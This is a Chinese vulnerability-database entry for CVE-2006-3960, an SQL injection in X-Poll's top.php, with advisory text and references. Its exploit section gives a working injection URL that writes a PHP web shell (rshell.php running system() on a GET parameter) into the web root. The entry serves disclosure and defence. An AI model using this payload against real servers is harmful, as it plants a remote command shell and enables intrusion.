X-Scripts X-Poll 'Top.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110699 漏洞类型 SQL注入
发布时间 2006-07-29 更新时间 2006-08-08
CVE编号 CVE-2006-3960 CNNVD-ID CNNVD-200608-024
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28304
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-024
|漏洞详情
可能是X-ScriptsX-Poll2.30版本中的top.php存在SQL注入漏洞,远程攻击者可借助poll参数执行任意SQL指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/19236/info

X-Poll is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

X-Poll 1.10 is vulnerable to this issue.

http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
OUTFILE '/usr/webserver/public_htm/rshell.php
|参考资料

来源:BID
名称:19236
链接:http://www.securityfocus.com/bid/19236
来源:VUPEN
名称:ADV-2006-3070
链接:http://www.frsirt.com/english/advisories/2006/3070
来源:SECUNIA
名称:21283
链接:http://secunia.com/advisories/21283
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/x-poll_poc.txt
来源:FULLDISC
名称:20060729X-PollSQLInjectionVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0720.html
来源:OSVDB
名称:27634
链接:http://www.osvdb.org/27634